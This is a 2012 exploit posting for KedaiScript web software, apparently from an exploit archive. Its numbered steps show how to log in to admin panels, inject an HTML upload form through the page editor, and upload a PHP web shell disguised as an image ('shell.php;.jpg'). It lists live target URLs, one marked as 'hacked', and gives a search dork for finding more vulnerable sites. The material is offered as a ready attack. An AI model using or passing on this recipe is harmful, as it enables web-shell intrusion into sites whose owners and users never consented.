Home / exploits KedaiScript Shell Upload
Posted on 11 February 2012
################################################################ # # Exploit Title: KedaiScript Remote Upload Shell Vulnerability # DDate: 10-02-2012 # Author: Netrondoank # Software Link: www.kedaiscript.com # Version: mlm10v21,mmgbinary,portal # Tested on: windows 7 # Contact: netron@indonesiansecurity.or.id [~]######################################### E X P L O I T #############################################[~] # # 1. Login As Demo http://kedaiscript.com/demo/portal/administrator # http://kedaiscript.com/demo/mmgbinary/user/temp_login.php http://kedaiscript.com/demo/mlm3x10/administrator/?id=syech # # 2. edit html via articles or edit page Use This Script for Upload ----------------------------------------------------------------------------- <form enctype="multipart/form-data" action="upload.php" method="POST"> Please choose a file: <input name="uploaded" type="file" /><br /> <input type="submit" value="Upload" /> </form> ----------------------------------------------------------------------------- # # 3. Upload File Image [ Browse/Upload ] ## Example # http://kedaiscript.com/demo/portal/upload.php # http://kedaiscript.com/demo/mlm10v21/administrator/upload_file.php # http://kedaiscript.com/demo/mlm3x10/ # 4. Php renamed via the .asp;.jpg (shell.php;.jpg) # # 5. http://kedaiscript.com/demo/mlm10v21/download/ [You can get the address at the See Shell Shell upload] # # 6. In this section, file in the folder that you have selected in the previous section is placed . # # 7 . Example URL : http://kedaiscript.com/demo/portal/upload.php http://kedaiscript.com/demo/mlm10v21/administrator/products.php # this is was hacked http://kedaiscript.com/demo/mlm3x10/ # Dork : "Powered by: MMG Malang" # note : netron memang ganteng ^_^ # [~]######################################### ThankS To ... ###########################################[~] # Special THX ALL Member indonesiansecurity.or.id ,ilmuhacker.org and SCAN-NUSANTARA (SCANNERZ) # [~]######################################### FinisH :D #############################################[~]
